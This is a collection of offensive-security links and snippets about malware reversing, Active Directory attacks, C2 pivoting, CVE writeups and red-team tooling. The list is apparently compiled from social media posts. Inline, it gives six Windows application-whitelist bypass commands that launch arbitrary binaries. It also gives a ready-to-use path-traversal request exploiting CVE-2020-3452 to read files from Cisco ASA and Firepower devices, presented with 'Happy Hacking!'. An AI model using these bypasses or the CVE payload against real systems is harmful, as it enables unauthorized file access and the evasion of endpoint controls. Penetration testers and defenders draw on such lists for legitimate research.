Reverse Engineering Malware, Part 4: Windows Internals
https://www.hackers-arise.com/single-post/2017/07/04/Reverse-Engineering-Malware-Part-4-Windows-Internals

Fuzzing FastCGI With AFL-Fuzz. This is the very long tale of my… | by Omaid Faizyar | Jul, 2020 | Medium
https://medium.com/@omaidfaizyar/fuzzing-fastcgi-an-odyssey-4ffc1c72a732

Quick list of some app whitelist bypasses to try..

forfiles /p c:\windows\system32 /m notepad.exe /c <bin>

explorer.exe /root,"<bin>"

pcalua.exe -a <bin>

scriptrunner.exe -appvscript <bin>

wmic process call create <bin>

rundll32.exe advpack.dll, RegisterOCX <bin>

Top 16 Active Directory Vulnerabilities - InfosecMatter
https://www.infosecmatter.com/top-16-active-directory-vulnerabilities/

AD Attack

1) Performing domain recon using PS
https://t.co/Pt6VpJqGdO

2) Attack mapping with bloodhound
https://t.co/CpmB4XW3pq

3) Extracting passwd hashes
https://t.co/f55XUSyx1k

4) Pass-the-hash attacks with mimikatz
https://t.co/PPkBjPpVgK

HTTP(s) C2 Pivoting. Introduction | by Steve Borosh | Jul, 2020 | Medium
https://medium.com/@rvrsh3ll/offensive-internal-http-s-agent-pivoting-2e9b4b7e58d8

GitHub - Q4n/CVE-2020-1362: writeup of CVE-2020-1362
https://github.com/Q4n/CVE-2020-1362

Releases · BC-SECURITY/Starkiller · GitHub
https://github.com/BC-SECURITY/Starkiller/releases

GitHub - hlldz/dazzleUP: A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.
https://github.com/hlldz/dazzleUP

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.

For example to read "/+CSCOE+/portal_inc.lua" file.

https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

Happy Hacking!

NATO releases Malware Analysis primer


https://ccdcoe.org/library/publications/malware-reverse-engineering-handbook/